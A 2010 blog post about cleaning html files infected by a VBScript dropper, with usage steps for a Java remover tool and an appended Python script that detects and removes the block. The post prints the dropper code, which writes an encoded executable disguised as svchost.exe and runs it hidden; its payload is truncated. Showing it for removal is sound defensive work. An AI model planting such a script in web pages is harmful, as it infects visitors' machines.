Monday, August 9, 2010

Script VB Dropper malware remover only for the infected html

We got a virus infection on a PC last week. It is a new one, and I found some discussions on the internet, for example this one:

http://www.bleepingcomputer.com/forums/topic336927.html

but found no real solution.

My colleague Dennis Sachs figured out that avast! Pro Antivirus can deal with this kind of malware. We gave it a shot and it works! Thanks Dennis! All infected exe and dll files were repaired and all infected html files were found. Then we got another problem: the html files cannot be fixed by that program. That is okay, I can write a remover program to handle it.

ATTENTION: this tool will ONLY handle all infected html/htm files. For fixing the infected .exe and .dll files, an antivirus program is still needed.

To check whether an html file is infected, just take a look at the bottom of the html/htm file. If you see the following code, congratulations! It is infected:


<SCRIPT language="VBScript"><! --
DropFileName = "svchost.exe"
WriteData = "4D5A90000300000004000000FFFF0000B8000000 // very long here...
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//-->

You can use this tool to fix all infected html files.


How to use it:

1. Java must be installed on your computer.
2. Download the VBSDropperRemover.jar and save it to [downloadedPath]\VBSDropperRemover.jar.
3. Create a new directory [downloadedPath]\lib.

Or, you can also just download this zip file and extract it to your [downloadedPath].

call:

java -jar [downloadedPath]\VBSDropperRemover.jar
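
The check described above (a VBScript block appended at the bottom of the html/htm file) can also be scripted. The following Python code is an added example, not the source of VBSDropperRemover.jar: the function names, the constructed SAMPLE bytes and the .infected backup suffix are assumptions. It only treats a block as the dropper if it contains all four strings from the listing above and nothing follows it in the file.

```python
import re
import shutil
from pathlib import Path

# Opening tag as shown on the page (quotes optional, any case).
OPEN_TAG = re.compile(rb'<script\s+language\s*=\s*"?vbscript"?\s*>', re.I)
CLOSE_TAG = re.compile(rb"</script\s*>", re.I)
# Strings taken from the page's listing; all must occur inside the block.
MARKERS = (b"dropfilename", b"writedata", b"scripting.filesystemobject",
           b"wscript.shell")
# Constructed sample: a harmless page plus a truncated, inert copy of the block.
SAMPLE = (b"<html><body>Hello</body></html>\r\n"
          b'<SCRIPT language="VBScript"><!--\r\nDropFileName = "svchost.exe"\r\n'
          b'WriteData = "4D5A"\r\nSet FSO = CreateObject("Scripting.FileSystemObject")'
          b'\r\nSet WSHshell = CreateObject("WScript.Shell")\r\n//--></SCRIPT>')


def find_dropper(data: bytes):
    """Return (start, end) of a trailing dropper block, or None."""
    for m in reversed(list(OPEN_TAG.finditer(data))):
        close = CLOSE_TAG.search(data, m.end())
        end = close.end() if close else len(data)  # tolerate a missing close tag
        body = data[m.end():end].lower()
        # Flag it only if every marker matches and nothing follows the block.
        if all(k in body for k in MARKERS) and not data[end:].strip():
            return m.start(), end
    return None


def clean_bytes(data: bytes) -> bytes:
    """Cut the dropper block off; return data unchanged if none is found."""
    span = find_dropper(data)
    return data if span is None else data[:span[0]].rstrip() + b"\n"


def clean_tree(root: str) -> list:
    """Clean .html/.htm files under root, keeping a .infected copy of each."""
    fixed = []
    for path in sorted(Path(root).rglob("*")):
        if path.suffix.lower() not in (".html", ".htm") or not path.is_file():
            continue
        data = path.read_bytes()
        cleaned = clean_bytes(data)
        if cleaned != data:
            shutil.copy2(path, path.with_name(path.name + ".infected"))
            path.write_bytes(cleaned)
            fixed.append(str(path))
    return fixed
```

`clean_tree` returns the list of files it changed; the .infected copies are kept so a wrongly cleaned page can be restored, and should be deleted once the result is verified.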